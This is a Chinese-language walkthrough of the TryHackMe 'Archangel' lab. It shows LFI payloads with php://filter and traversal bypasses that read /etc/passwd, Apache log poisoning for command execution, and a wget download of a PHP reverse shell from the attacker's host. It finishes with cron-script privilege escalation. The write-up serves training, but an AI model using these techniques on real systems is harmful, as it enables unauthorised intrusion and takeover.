TryHackMe - Archangel靶场
作者:互联网
Archangel
Boot2root, Web exploitation, Privilege escalation, LFI
0x01 信息收集
常规端口扫一波,发现只有22和80端口开放 先从80端口入手,常规的扫目录没有发现有价值的东西 在源代码里发现一个可以的域名 网站找不到突破口,试着修改本地的hosts文件指向改域名,访问后获得第一个flag 在用gobuster扫描网站目录,得到test.php和robots.txt robots.txt里面指的也是test.php0x02 文件包含
打开test.php看路径像是有文件包含的漏洞 用php伪协议包含到test.php文件 php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php 分析源代码if需要满足两个条件没有../..和 /var/www/html/development_testing 根据条件读取/etc/passwd php://filter/resource=/var/www/html/development_testing/..//..//..//..//..//..//..//..//..//..//..//etc/passwd 也可以用.././.././绕过 ..%2f/..%2f/..%2f/也能绕过 尝试包含apache日志getshell 在User-Agent里插入phpinfo函数测试一下 成功解析0x03 GetShell
插入system执行命令函数 给cmd传参成功执行,接下来就是用kali自带的php反向shell脚本getshell 修改文件的反向链接的地址和端口 用python3搭建一个简单的网站 python3 -m http.server 4444 执行函数用wget 下载脚本 wget http://10.10.220.123:4444/php-serverse-shell.php 下载成功后在同级目录下访问php-reverse-shell.php 访问前记得先用nc起监听0x04 权限提升
shell过来后准备提权,现先翻一下可以提权的脚本,发现/etc/crontab目录下有helloworld.sh以archanggel用户自动运行的脚本 过去看下是个自动运行的sh文件,具有可读可写权限。在文件后面添加反弹shell的命令。 稍等片刻便能获得archangel权限标签:文件,Archangel,shell,..,端口,test,靶场,php,TryHackMe 来源: https://blog.csdn.net/qq_44101248/article/details/113957607